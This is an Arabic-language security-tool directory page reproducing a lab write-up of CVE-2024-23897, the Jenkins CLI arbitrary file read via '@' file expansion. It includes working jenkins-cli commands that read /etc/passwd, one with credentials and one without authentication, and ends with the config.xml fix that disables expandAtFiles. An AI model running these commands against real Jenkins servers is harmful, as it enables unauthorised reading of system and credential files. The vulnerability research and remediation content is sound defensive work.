Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
PoC-Fix-jenkins-rce_CVE-2024-23897 — في هذا git يمكنك العثور على جميع المعلومات حول CVE-2024-23897 | Kitploit
أدوات/GitHubGitHub/10t4/poc-fix-jenkins-rce_cve-2024-23897
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHub10t4/poc-fix-jenkins-rce_cve-2024-23897

PoC-Fix-jenkins-rce_CVE-2024-23897

في هذا git يمكنك العثور على جميع المعلومات حول CVE-2024-23897

عرض المستودع
42منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

PoC-jenkins-rce_CVE-2024-23897.

في هذا المستودع، يمكنك العثور على جميع المعلومات حول CVE-2024-23897.

logo-jenkins

مقدمة

تم وصف المشكلة، التي تم تخصيص معرف CVE لها CVE-2024-23897، على أنها ثغرة قراءة ملفات عشوائية عبر واجهة سطر الأوامر المدمجة. يحتوي هذا المحلل اللغوي للأوامر على ميزة تستبدل الحرف @ المتبوع بمسار ملف في الوسيطة بمحتويات الملف (expandAtFiles). هذه الميزة مفعلة افتراضيًا، ولا تقوم Jenkins 2.441 والإصدارات الأقدم، و LTS 2.426.2 والإصدارات الأقدم بتعطيلها.

PoC

من أجل هذا الإثبات، قمت بتثبيت Jenkins 2.426.2 باستخدام Docker لاختبار استغلال الثغرة

root@kitploit:~
docker run -p 8080:8080 -p 50000:50000 -v jenkins_home:/var/jenkins_home jenkins/jenkins:2.426.2

بعد إنشاء مستخدم وكلمة مرور، قمت بتنزيل عميل واجهة سطر الأوامر Jenkins (jenkins-cli.jar) على جهاز المهاجم الخاص بي.

screen1

ثم كتبت الأمر لاستغلال الثغرة. في هذا الأمر، نحتاج إلى الحصول على بيانات اعتماد مستخدم Jenkins.

root@kitploit:~
وإضافة السطر:
java -jar jenkins-cli.jar -s http://192.168.1.45:8080/ -auth "user:aze+123" connect-node "@/etc/passwd"
screen2

يسمح أمر آخر بعرض الأسطر الأولى من ملف دون مصادقة.

root@kitploit:~
java -jar jenkins-cli.jar -noCertificateCheck -s 'http://192.168.1.45:8080' help "@/etc/passwd"
screen3

إصلاح الثغرة

لمواجهة هذه الثغرة، تحتاج إلى الانتقال إلى ملف تكوين Jenkins المسمى config.xml (في حالتي، يوجد في حاوية Docker الخاصة بي، لذا أقوم بالتبديل إلى وضع الصدفة في الحاوية)

screen4
root@kitploit:~
<expandAtFiles>false</expandAtFiles>

وإعادة تشغيل Jenkins:

root@kitploit:~
service jenkins restart
تنزيل الأداة